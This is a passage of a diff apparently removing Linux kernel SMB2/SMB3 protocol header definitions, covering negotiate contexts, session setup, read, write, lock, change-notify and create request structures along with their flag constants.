+-	/* Followed by array of data. NOTE: some servers require padding to 8 byte boundary */
+-} __packed;
+-
+-/*
+- * SaltLength that the server send can be zero, so the only three required
+- * fields (all __le16) end up six bytes total, so the minimum context data len
+- * in the response is six bytes which accounts for
+- *
+- *      HashAlgorithmCount, SaltLength, and 1 HashAlgorithm.
+- */
+-#define MIN_PREAUTH_CTXT_DATA_LEN 6
+-
+-struct smb2_preauth_neg_context {
+-	__le16	ContextType; /* 1 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__le16	HashAlgorithmCount; /* 1 */
+-	__le16	SaltLength;
+-	__le16	HashAlgorithms; /* HashAlgorithms[0] since only one defined */
+-	__u8	Salt[SMB311_SALT_SIZE];
+-} __packed;
+-
+-/* Encryption Algorithms Ciphers */
+-#define SMB2_ENCRYPTION_AES128_CCM	cpu_to_le16(0x0001)
+-#define SMB2_ENCRYPTION_AES128_GCM	cpu_to_le16(0x0002)
+-#define SMB2_ENCRYPTION_AES256_CCM      cpu_to_le16(0x0003)
+-#define SMB2_ENCRYPTION_AES256_GCM      cpu_to_le16(0x0004)
+-
+-/* Min encrypt context data is one cipher so 2 bytes + 2 byte count field */
+-#define MIN_ENCRYPT_CTXT_DATA_LEN	4
+-struct smb2_encryption_neg_context {
+-	__le16	ContextType; /* 2 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	/* CipherCount usally 2, but can be 3 when AES256-GCM enabled */
+-	__le16	CipherCount; /* AES128-GCM and AES128-CCM by default */
+-	__le16	Ciphers[];
+-} __packed;
+-
+-/* See MS-SMB2 2.2.3.1.3 */
+-#define SMB3_COMPRESS_NONE	cpu_to_le16(0x0000)
+-#define SMB3_COMPRESS_LZNT1	cpu_to_le16(0x0001)
+-#define SMB3_COMPRESS_LZ77	cpu_to_le16(0x0002)
+-#define SMB3_COMPRESS_LZ77_HUFF	cpu_to_le16(0x0003)
+-/* Pattern scanning algorithm See MS-SMB2 3.1.4.4.1 */
+-#define SMB3_COMPRESS_PATTERN	cpu_to_le16(0x0004) /* Pattern_V1 */
+-
+-/* Compression Flags */
+-#define SMB2_COMPRESSION_CAPABILITIES_FLAG_NONE		cpu_to_le32(0x00000000)
+-#define SMB2_COMPRESSION_CAPABILITIES_FLAG_CHAINED	cpu_to_le32(0x00000001)
+-
+-struct smb2_compression_capabilities_context {
+-	__le16	ContextType; /* 3 */
+-	__le16  DataLength;
+-	__le32	Reserved;
+-	__le16	CompressionAlgorithmCount;
+-	__le16	Padding;
+-	__le32	Flags;
+-	__le16	CompressionAlgorithms[3];
+-	__u16	Pad;  /* Some servers require pad to DataLen multiple of 8 */
+-	/* Check if pad needed */
+-} __packed;
+-
+-/*
+- * For smb2_netname_negotiate_context_id See MS-SMB2 2.2.3.1.4.
+- * Its struct simply contains NetName, an array of Unicode characters
+- */
+-struct smb2_netname_neg_context {
+-	__le16	ContextType; /* 5 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__le16	NetName[]; /* hostname of target converted to UCS-2 */
+-} __packed;
+-
+-/*
+- * For smb2_transport_capabilities context see MS-SMB2 2.2.3.1.5
+- * and 2.2.4.1.5
+- */
+-
+-/* Flags */
+-#define SMB2_ACCEPT_TRANSPORT_LEVEL_SECURITY	0x00000001
+-
+-struct smb2_transport_capabilities_context {
+-	__le16	ContextType; /* 6 */
+-	__le16  DataLength;
+-	__u32	Reserved;
+-	__le32	Flags;
+-	__u32	Pad;
+-} __packed;
+-
+-/*
+- * For rdma transform capabilities context see MS-SMB2 2.2.3.1.6
+- * and 2.2.4.1.6
+- */
+-
+-/* RDMA Transform IDs */
+-#define SMB2_RDMA_TRANSFORM_NONE	0x0000
+-#define SMB2_RDMA_TRANSFORM_ENCRYPTION	0x0001
+-#define SMB2_RDMA_TRANSFORM_SIGNING	0x0002
+-
+-struct smb2_rdma_transform_capabilities_context {
+-	__le16	ContextType; /* 7 */
+-	__le16  DataLength;
+-	__u32	Reserved;
+-	__le16	TransformCount;
+-	__u16	Reserved1;
+-	__u32	Reserved2;
+-	__le16	RDMATransformIds[];
+-} __packed;
+-
+-/*
+- * For signing capabilities context see MS-SMB2 2.2.3.1.7
+- * and 2.2.4.1.7
+- */
+-
+-/* Signing algorithms */
+-#define SIGNING_ALG_HMAC_SHA256    0
+-#define SIGNING_ALG_HMAC_SHA256_LE cpu_to_le16(0)
+-#define SIGNING_ALG_AES_CMAC       1
+-#define SIGNING_ALG_AES_CMAC_LE    cpu_to_le16(1)
+-#define SIGNING_ALG_AES_GMAC       2
+-#define SIGNING_ALG_AES_GMAC_LE    cpu_to_le16(2)
+-
+-struct smb2_signing_capabilities {
+-	__le16	ContextType; /* 8 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__le16	SigningAlgorithmCount;
+-	__le16	SigningAlgorithms[];
+-	/*  Followed by padding to 8 byte boundary (required by some servers) */
+-} __packed;
+-
+-#define POSIX_CTXT_DATA_LEN	16
+-struct smb2_posix_neg_context {
+-	__le16	ContextType; /* 0x100 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__u8	Name[16]; /* POSIX ctxt GUID 93AD25509CB411E7B42383DE968BCD7C */
+-} __packed;
+-
+-struct smb2_negotiate_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 36 */
+-	__le16 DialectCount;
+-	__le16 SecurityMode;
+-	__le16 Reserved;	/* MBZ */
+-	__le32 Capabilities;
+-	__u8   ClientGUID[SMB2_CLIENT_GUID_SIZE];
+-	/* In SMB3.02 and earlier next three were MBZ le64 ClientStartTime */
+-	__le32 NegotiateContextOffset; /* SMB3.1.1 only. MBZ earlier */
+-	__le16 NegotiateContextCount;  /* SMB3.1.1 only. MBZ earlier */
+-	__le16 Reserved2;
+-	__le16 Dialects[];
+-} __packed;
+-
+-struct smb2_negotiate_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 65 */
+-	__le16 SecurityMode;
+-	__le16 DialectRevision;
+-	__le16 NegotiateContextCount;	/* Prior to SMB3.1.1 was Reserved & MBZ */
+-	__u8   ServerGUID[16];
+-	__le32 Capabilities;
+-	__le32 MaxTransactSize;
+-	__le32 MaxReadSize;
+-	__le32 MaxWriteSize;
+-	__le64 SystemTime;	/* MBZ */
+-	__le64 ServerStartTime;
+-	__le16 SecurityBufferOffset;
+-	__le16 SecurityBufferLength;
+-	__le32 NegotiateContextOffset;	/* Pre:SMB3.1.1 was reserved/ignored */
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
+-} __packed;
+-
+-
+-/*
+- * SMB2_SESSION_SETUP  See MS-SMB2 section 2.2.5
+- */
+-/* Flags */
+-#define SMB2_SESSION_REQ_FLAG_BINDING		0x01
+-#define SMB2_SESSION_REQ_FLAG_ENCRYPT_DATA	0x04
+-
+-struct smb2_sess_setup_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 25 */
+-	__u8   Flags;
+-	__u8   SecurityMode;
+-	__le32 Capabilities;
+-	__le32 Channel;
+-	__le16 SecurityBufferOffset;
+-	__le16 SecurityBufferLength;
+-	__le64 PreviousSessionId;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
+-} __packed;
+-
+-/* Currently defined SessionFlags */
+-#define SMB2_SESSION_FLAG_IS_GUEST        0x0001
+-#define SMB2_SESSION_FLAG_IS_GUEST_LE     cpu_to_le16(0x0001)
+-#define SMB2_SESSION_FLAG_IS_NULL         0x0002
+-#define SMB2_SESSION_FLAG_IS_NULL_LE      cpu_to_le16(0x0002)
+-#define SMB2_SESSION_FLAG_ENCRYPT_DATA    0x0004
+-#define SMB2_SESSION_FLAG_ENCRYPT_DATA_LE cpu_to_le16(0x0004)
+-
+-struct smb2_sess_setup_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 9 */
+-	__le16 SessionFlags;
+-	__le16 SecurityBufferOffset;
+-	__le16 SecurityBufferLength;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
+-} __packed;
+-
+-
+-/*
+- * SMB2_LOGOFF  See MS-SMB2 section 2.2.7
+- */
+-struct smb2_logoff_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-struct smb2_logoff_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-
+-/*
+- * SMB2_CLOSE  See MS-SMB2 section 2.2.15
+- */
+-/* Currently defined values for close flags */
+-#define SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB	cpu_to_le16(0x0001)
+-struct smb2_close_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 24 */
+-	__le16 Flags;
+-	__le32 Reserved;
+-	__u64  PersistentFileId; /* opaque endianness */
+-	__u64  VolatileFileId; /* opaque endianness */
+-} __packed;
+-
+-/*
+- * Maximum size of a SMB2_CLOSE response is 64 (smb2 header) + 60 (data)
+- */
+-#define MAX_SMB2_CLOSE_RESPONSE_SIZE 124
+-
+-struct smb2_close_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* 60 */
+-	__le16 Flags;
+-	__le32 Reserved;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
+-	__le64 EndOfFile;
+-	__le32 Attributes;
+-} __packed;
+-
+-
+-/*
+- * SMB2_READ  See MS-SMB2 section 2.2.19
+- */
+-/* For read request Flags field below, following flag is defined for SMB3.02 */
+-#define SMB2_READFLAG_READ_UNBUFFERED	0x01
+-#define SMB2_READFLAG_REQUEST_COMPRESSED 0x02 /* See MS-SMB2 2.2.19 */
+-
+-/* Channel field for read and write: exactly one of following flags can be set*/
+-#define SMB2_CHANNEL_NONE               cpu_to_le32(0x00000000)
+-#define SMB2_CHANNEL_RDMA_V1            cpu_to_le32(0x00000001)
+-#define SMB2_CHANNEL_RDMA_V1_INVALIDATE cpu_to_le32(0x00000002)
+-#define SMB2_CHANNEL_RDMA_TRANSFORM     cpu_to_le32(0x00000003)
+-
+-/* SMB2 read request without RFC1001 length at the beginning */
+-struct smb2_read_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 49 */
+-	__u8   Padding; /* offset from start of SMB2 header to place read */
+-	__u8   Flags; /* MBZ unless SMB3.02 or later */
+-	__le32 Length;
+-	__le64 Offset;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 MinimumCount;
+-	__le32 Channel; /* MBZ except for SMB3 or later */
+-	__le32 RemainingBytes;
+-	__le16 ReadChannelInfoOffset;
+-	__le16 ReadChannelInfoLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-/* Read flags */
+-#define SMB2_READFLAG_RESPONSE_NONE            cpu_to_le32(0x00000000)
+-#define SMB2_READFLAG_RESPONSE_RDMA_TRANSFORM  cpu_to_le32(0x00000001)
+-
+-struct smb2_read_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 17 */
+-	__u8   DataOffset;
+-	__u8   Reserved;
+-	__le32 DataLength;
+-	__le32 DataRemaining;
+-	__le32 Flags;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-
+-/*
+- * SMB2_WRITE  See MS-SMB2 section 2.2.21
+- */
+-/* For write request Flags field below the following flags are defined: */
+-#define SMB2_WRITEFLAG_WRITE_THROUGH	0x00000001	/* SMB2.1 or later */
+-#define SMB2_WRITEFLAG_WRITE_UNBUFFERED	0x00000002	/* SMB3.02 or later */
+-
+-struct smb2_write_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 49 */
+-	__le16 DataOffset; /* offset from start of SMB2 header to write data */
+-	__le32 Length;
+-	__le64 Offset;
+-	__u64  PersistentFileId; /* opaque endianness */
+-	__u64  VolatileFileId; /* opaque endianness */
+-	__le32 Channel; /* MBZ unless SMB3.02 or later */
+-	__le32 RemainingBytes;
+-	__le16 WriteChannelInfoOffset;
+-	__le16 WriteChannelInfoLength;
+-	__le32 Flags;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_write_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 17 */
+-	__u8   DataOffset;
+-	__u8   Reserved;
+-	__le32 DataLength;
+-	__le32 DataRemaining;
+-	__u32  Reserved2;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-
+-/*
+- * SMB2_FLUSH  See MS-SMB2 section 2.2.17
+- */
+-struct smb2_flush_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 24 */
+-	__le16 Reserved1;
+-	__le32 Reserved2;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-} __packed;
+-
+-struct smb2_flush_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;
+-	__le16 Reserved;
+-} __packed;
+-
+-#define SMB2_LOCKFLAG_SHARED		0x0001
+-#define SMB2_LOCKFLAG_EXCLUSIVE		0x0002
+-#define SMB2_LOCKFLAG_UNLOCK		0x0004
+-#define SMB2_LOCKFLAG_FAIL_IMMEDIATELY	0x0010
+-#define SMB2_LOCKFLAG_MASK		0x0007
+-
+-struct smb2_lock_element {
+-	__le64 Offset;
+-	__le64 Length;
+-	__le32 Flags;
+-	__le32 Reserved;
+-} __packed;
+-
+-struct smb2_lock_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 48 */
+-	__le16 LockCount;
+-	/*
+-	 * The least significant four bits are the index, the other 28 bits are
+-	 * the lock sequence number (0 to 64). See MS-SMB2 2.2.26
+-	 */
+-	__le32 LockSequenceNumber;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	/* Followed by at least one */
+-	struct smb2_lock_element locks[1];
+-} __packed;
+-
+-struct smb2_lock_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-struct smb2_echo_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__u16  Reserved;
+-} __packed;
+-
+-struct smb2_echo_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__u16  Reserved;
+-} __packed;
+-
+-/*
+- * Valid FileInformation classes for query directory
+- *
+- * Note that these are a subset of the (file) QUERY_INFO levels defined
+- * later in this file (but since QUERY_DIRECTORY uses equivalent numbers
+- * we do not redefine them here)
+- *
+- * FileDirectoryInfomation		0x01
+- * FileFullDirectoryInformation		0x02
+- * FileIdFullDirectoryInformation	0x26
+- * FileBothDirectoryInformation		0x03
+- * FileIdBothDirectoryInformation	0x25
+- * FileNamesInformation			0x0C
+- * FileIdExtdDirectoryInformation	0x3C
+- */
+-
+-/* search (query_directory) Flags field */
+-#define SMB2_RESTART_SCANS		0x01
+-#define SMB2_RETURN_SINGLE_ENTRY	0x02
+-#define SMB2_INDEX_SPECIFIED		0x04
+-#define SMB2_REOPEN			0x10
+-
+-struct smb2_query_directory_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 33 */
+-	__u8   FileInformationClass;
+-	__u8   Flags;
+-	__le32 FileIndex;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le16 FileNameOffset;
+-	__le16 FileNameLength;
+-	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_query_directory_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 9 */
+-	__le16 OutputBufferOffset;
+-	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-/*
+- * Maximum number of iovs we need for a set-info request.
+- * The largest one is rename/hardlink
+- * [0] : struct smb2_set_info_req + smb2_file_[rename|link]_info
+- * [1] : path
+- * [2] : compound padding
+- */
+-#define SMB2_SET_INFO_IOV_SIZE 3
+-
+-struct smb2_set_info_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 33 */
+-	__u8   InfoType;
+-	__u8   FileInfoClass;
+-	__le32 BufferLength;
+-	__le16 BufferOffset;
+-	__u16  Reserved;
+-	__le32 AdditionalInformation;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_set_info_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 2 */
+-} __packed;
+-
+-/*
+- * SMB2_NOTIFY  See MS-SMB2 section 2.2.35
+- */
+-/* notify flags */
+-#define SMB2_WATCH_TREE			0x0001
+-
+-/* notify completion filter flags. See MS-FSCC 2.6 and MS-SMB2 2.2.35 */
+-#define FILE_NOTIFY_CHANGE_FILE_NAME		0x00000001
+-#define FILE_NOTIFY_CHANGE_DIR_NAME		0x00000002
+-#define FILE_NOTIFY_CHANGE_ATTRIBUTES		0x00000004
+-#define FILE_NOTIFY_CHANGE_SIZE			0x00000008
+-#define FILE_NOTIFY_CHANGE_LAST_WRITE		0x00000010
+-#define FILE_NOTIFY_CHANGE_LAST_ACCESS		0x00000020
+-#define FILE_NOTIFY_CHANGE_CREATION		0x00000040
+-#define FILE_NOTIFY_CHANGE_EA			0x00000080
+-#define FILE_NOTIFY_CHANGE_SECURITY		0x00000100
+-#define FILE_NOTIFY_CHANGE_STREAM_NAME		0x00000200
+-#define FILE_NOTIFY_CHANGE_STREAM_SIZE		0x00000400
+-#define FILE_NOTIFY_CHANGE_STREAM_WRITE		0x00000800
+-
+-/* SMB2 Notify Action Flags */
+-#define FILE_ACTION_ADDED                       0x00000001
+-#define FILE_ACTION_REMOVED                     0x00000002
+-#define FILE_ACTION_MODIFIED                    0x00000003
+-#define FILE_ACTION_RENAMED_OLD_NAME            0x00000004
+-#define FILE_ACTION_RENAMED_NEW_NAME            0x00000005
+-#define FILE_ACTION_ADDED_STREAM                0x00000006
+-#define FILE_ACTION_REMOVED_STREAM              0x00000007
+-#define FILE_ACTION_MODIFIED_STREAM             0x00000008
+-#define FILE_ACTION_REMOVED_BY_DELETE           0x00000009
+-
+-struct smb2_change_notify_req {
+-	struct smb2_hdr hdr;
+-	__le16	StructureSize;
+-	__le16	Flags;
+-	__le32	OutputBufferLength;
+-	__u64	PersistentFileId; /* opaque endianness */
+-	__u64	VolatileFileId; /* opaque endianness */
+-	__le32	CompletionFilter;
+-	__u32	Reserved;
+-} __packed;
+-
+-struct smb2_change_notify_rsp {
+-	struct smb2_hdr hdr;
+-	__le16	StructureSize;  /* Must be 9 */
+-	__le16	OutputBufferOffset;
+-	__le32	OutputBufferLength;
+-	__u8	Buffer[1]; /* array of file notify structs */
+-} __packed;
+-
+-
+-/*
+- * SMB2_CREATE  See MS-SMB2 section 2.2.13
+- */
+-/* Oplock levels */
+-#define SMB2_OPLOCK_LEVEL_NONE		0x00
+-#define SMB2_OPLOCK_LEVEL_II		0x01
+-#define SMB2_OPLOCK_LEVEL_EXCLUSIVE	0x08
+-#define SMB2_OPLOCK_LEVEL_BATCH		0x09
+-#define SMB2_OPLOCK_LEVEL_LEASE		0xFF
+-/* Non-spec internal type */
+-#define SMB2_OPLOCK_LEVEL_NOCHANGE	0x99
+-
+-/* Impersonation Levels. See MS-WPO section 9.7 and MSDN-IMPERS */
+-#define IL_ANONYMOUS		cpu_to_le32(0x00000000)
+-#define IL_IDENTIFICATION	cpu_to_le32(0x00000001)
+-#define IL_IMPERSONATION	cpu_to_le32(0x00000002)
+-#define IL_DELEGATE		cpu_to_le32(0x00000003)
+-
+-/* File Attrubutes */
+-#define FILE_ATTRIBUTE_READONLY			0x00000001
+-#define FILE_ATTRIBUTE_HIDDEN			0x00000002
+-#define FILE_ATTRIBUTE_SYSTEM			0x00000004
+-#define FILE_ATTRIBUTE_DIRECTORY		0x00000010
+-#define FILE_ATTRIBUTE_ARCHIVE			0x00000020
+-#define FILE_ATTRIBUTE_NORMAL			0x00000080
+-#define FILE_ATTRIBUTE_TEMPORARY		0x00000100
+-#define FILE_ATTRIBUTE_SPARSE_FILE		0x00000200
+-#define FILE_ATTRIBUTE_REPARSE_POINT		0x00000400
+-#define FILE_ATTRIBUTE_COMPRESSED		0x00000800
+-#define FILE_ATTRIBUTE_OFFLINE			0x00001000
+-#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED	0x00002000
+-#define FILE_ATTRIBUTE_ENCRYPTED		0x00004000
+-#define FILE_ATTRIBUTE_INTEGRITY_STREAM		0x00008000
+-#define FILE_ATTRIBUTE_NO_SCRUB_DATA		0x00020000
+-#define FILE_ATTRIBUTE__MASK			0x00007FB7
+-
+-#define FILE_ATTRIBUTE_READONLY_LE              cpu_to_le32(0x00000001)
+-#define FILE_ATTRIBUTE_HIDDEN_LE		cpu_to_le32(0x00000002)
+-#define FILE_ATTRIBUTE_SYSTEM_LE		cpu_to_le32(0x00000004)
+-#define FILE_ATTRIBUTE_DIRECTORY_LE		cpu_to_le32(0x00000010)
+-#define FILE_ATTRIBUTE_ARCHIVE_LE		cpu_to_le32(0x00000020)
+-#define FILE_ATTRIBUTE_NORMAL_LE		cpu_to_le32(0x00000080)
+-#define FILE_ATTRIBUTE_TEMPORARY_LE		cpu_to_le32(0x00000100)
+-#define FILE_ATTRIBUTE_SPARSE_FILE_LE		cpu_to_le32(0x00000200)
+-#define FILE_ATTRIBUTE_REPARSE_POINT_LE		cpu_to_le32(0x00000400)
+-#define FILE_ATTRIBUTE_COMPRESSED_LE		cpu_to_le32(0x00000800)
+-#define FILE_ATTRIBUTE_OFFLINE_LE		cpu_to_le32(0x00001000)
+-#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED_LE	cpu_to_le32(0x00002000)
+-#define FILE_ATTRIBUTE_ENCRYPTED_LE		cpu_to_le32(0x00004000)
+-#define FILE_ATTRIBUTE_INTEGRITY_STREAM_LE	cpu_to_le32(0x00008000)
+-#define FILE_ATTRIBUTE_NO_SCRUB_DATA_LE		cpu_to_le32(0x00020000)
+-#define FILE_ATTRIBUTE_MASK_LE			cpu_to_le32(0x00007FB7)
+-
+-/* Desired Access Flags */
+-#define FILE_READ_DATA_LE		cpu_to_le32(0x00000001)
+-#define FILE_LIST_DIRECTORY_LE		cpu_to_le32(0x00000001)
+-#define FILE_WRITE_DATA_LE		cpu_to_le32(0x00000002)
+-#define FILE_APPEND_DATA_LE		cpu_to_le32(0x00000004)
+-#define FILE_ADD_SUBDIRECTORY_LE	cpu_to_le32(0x00000004)
+-#define FILE_READ_EA_LE			cpu_to_le32(0x00000008)
+-#define FILE_WRITE_EA_LE		cpu_to_le32(0x00000010)
+-#define FILE_EXECUTE_LE			cpu_to_le32(0x00000020)
+-#define FILE_DELETE_CHILD_LE		cpu_to_le32(0x00000040)
+-#define FILE_READ_ATTRIBUTES_LE		cpu_to_le32(0x00000080)
+-#define FILE_WRITE_ATTRIBUTES_LE	cpu_to_le32(0x00000100)
+-#define FILE_DELETE_LE			cpu_to_le32(0x00010000)
+-#define FILE_READ_CONTROL_LE		cpu_to_le32(0x00020000)
+-#define FILE_WRITE_DAC_LE		cpu_to_le32(0x00040000)
+-#define FILE_WRITE_OWNER_LE		cpu_to_le32(0x00080000)
+-#define FILE_SYNCHRONIZE_LE		cpu_to_le32(0x00100000)
+-#define FILE_ACCESS_SYSTEM_SECURITY_LE	cpu_to_le32(0x01000000)
+-#define FILE_MAXIMAL_ACCESS_LE		cpu_to_le32(0x02000000)
+-#define FILE_GENERIC_ALL_LE		cpu_to_le32(0x10000000)
+-#define FILE_GENERIC_EXECUTE_LE		cpu_to_le32(0x20000000)
+-#define FILE_GENERIC_WRITE_LE		cpu_to_le32(0x40000000)
+-#define FILE_GENERIC_READ_LE		cpu_to_le32(0x80000000)
+-#define DESIRED_ACCESS_MASK             cpu_to_le32(0xF21F01FF)
+-
+-
+-#define FILE_READ_DESIRED_ACCESS_LE     (FILE_READ_DATA_LE        |	\
+-					 FILE_READ_EA_LE          |     \
+-					 FILE_GENERIC_READ_LE)
+-#define FILE_WRITE_DESIRE_ACCESS_LE     (FILE_WRITE_DATA_LE       |	\
+-					 FILE_APPEND_DATA_LE      |	\
+-					 FILE_WRITE_EA_LE         |	\
+-					 FILE_WRITE_ATTRIBUTES_LE |	\
+-					 FILE_GENERIC_WRITE_LE)
+-
+-/* ShareAccess Flags */
+-#define FILE_SHARE_READ_LE		cpu_to_le32(0x00000001)
+-#define FILE_SHARE_WRITE_LE		cpu_to_le32(0x00000002)
+-#define FILE_SHARE_DELETE_LE		cpu_to_le32(0x00000004)
+-#define FILE_SHARE_ALL_LE		cpu_to_le32(0x00000007)
+-
+-/* CreateDisposition Flags */
+-#define FILE_SUPERSEDE_LE		cpu_to_le32(0x00000000)
+-#define FILE_OPEN_LE			cpu_to_le32(0x00000001)
+-#define FILE_CREATE_LE			cpu_to_le32(0x00000002)
+-#define	FILE_OPEN_IF_LE			cpu_to_le32(0x00000003)
+-#define FILE_OVERWRITE_LE		cpu_to_le32(0x00000004)
+-#define FILE_OVERWRITE_IF_LE		cpu_to_le32(0x00000005)
+-#define FILE_CREATE_MASK_LE             cpu_to_le32(0x00000007)
+-
+-#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
+-			| FILE_READ_ATTRIBUTES)
+-#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-			| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
+-#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
+-
+-/* CreateOptions Flags */
+-#define FILE_DIRECTORY_FILE_LE		cpu_to_le32(0x00000001)
+-/* same as #define CREATE_NOT_FILE_LE	cpu_to_le32(0x00000001) */
+-#define FILE_WRITE_THROUGH_LE		cpu_to_le32(0x00000002)
+-#define FILE_SEQUENTIAL_ONLY_LE		cpu_to_le32(0x00000004)
+-#define FILE_NO_INTERMEDIATE_BUFFERING_LE cpu_to_le32(0x00000008)
+-#define FILE_NON_DIRECTORY_FILE_LE	cpu_to_le32(0x00000040)
+-#define FILE_COMPLETE_IF_OPLOCKED_LE	cpu_to_le32(0x00000100)
+-#define FILE_NO_EA_KNOWLEDGE_LE		cpu_to_le32(0x00000200)
+-#define FILE_RANDOM_ACCESS_LE		cpu_to_le32(0x00000800)
+-#define FILE_DELETE_ON_CLOSE_LE		cpu_to_le32(0x00001000)
+-#define FILE_OPEN_BY_FILE_ID_LE		cpu_to_le32(0x00002000)
+-#define FILE_OPEN_FOR_BACKUP_INTENT_LE	cpu_to_le32(0x00004000)
+-#define FILE_NO_COMPRESSION_LE		cpu_to_le32(0x00008000)
+-#define FILE_OPEN_REPARSE_POINT_LE	cpu_to_le32(0x00200000)
+-#define FILE_OPEN_NO_RECALL_LE		cpu_to_le32(0x00400000)
+-#define CREATE_OPTIONS_MASK_LE          cpu_to_le32(0x00FFFFFF)
+-
+-#define FILE_READ_RIGHTS_LE (FILE_READ_DATA_LE | FILE_READ_EA_LE \
+-			| FILE_READ_ATTRIBUTES_LE)
+-#define FILE_WRITE_RIGHTS_LE (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE \
+-			| FILE_WRITE_EA_LE | FILE_WRITE_ATTRIBUTES_LE)
+-#define FILE_EXEC_RIGHTS_LE (FILE_EXECUTE_LE)
+-
+-/* Create Context Values */
+-#define SMB2_CREATE_EA_BUFFER			"ExtA" /* extended attributes */
+-#define SMB2_CREATE_SD_BUFFER			"SecD" /* security descriptor */
+-#define SMB2_CREATE_DURABLE_HANDLE_REQUEST	"DHnQ"
+-#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT	"DHnC"
+-#define SMB2_CREATE_ALLOCATION_SIZE		"AISi"
+-#define SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST "MxAc"
+-#define SMB2_CREATE_TIMEWARP_REQUEST		"TWrp"
+-#define SMB2_CREATE_QUERY_ON_DISK_ID		"QFid"
+-#define SMB2_CREATE_REQUEST_LEASE		"RqLs"
+-#define SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2	"DH2Q"
+-#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2	"DH2C"
+-#define SMB2_CREATE_TAG_POSIX		"\x93\xAD\x25\x50\x9C\xB4\x11\xE7\xB4\x23\x83\xDE\x96\x8B\xCD\x7C"
+-#define SMB2_CREATE_APP_INSTANCE_ID	"\x45\xBC\xA6\x6A\xEF\xA7\xF7\x4A\x90\x08\xFA\x46\x2E\x14\x4D\x74"
+-#define SMB2_CREATE_APP_INSTANCE_VERSION "\xB9\x82\xD0\xB7\x3B\x56\x07\x4F\xA0\x7B\x52\x4A\x81\x16\xA0\x10"
+-#define SVHDX_OPEN_DEVICE_CONTEXT	"\x9C\xCB\xCF\x9E\x04\xC1\xE6\x43\x98\x0E\x15\x8D\xA1\xF6\xEC\x83"
+-#define SMB2_CREATE_TAG_AAPL			"AAPL"
+-
+-/* Flag (SMB3 open response) values */
+-#define SMB2_CREATE_FLAG_REPARSEPOINT 0x01
+-
+-struct create_context {
+-	__le32 Next;
+-	__le16 NameOffset;
+-	__le16 NameLength;
+-	__le16 Reserved;
+-	__le16 DataOffset;
+-	__le32 DataLength;
+-	__u8 Buffer[];
+-} __packed;
+-
+-struct smb2_create_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 57 */
+-	__u8   SecurityFlags;
+-	__u8   RequestedOplockLevel;
+-	__le32 ImpersonationLevel;
+-	__le64 SmbCreateFlags;
+-	__le64 Reserved;
+-	__le32 DesiredAccess;
+-	__le32 FileAttributes;
+-	__le32 ShareAccess;
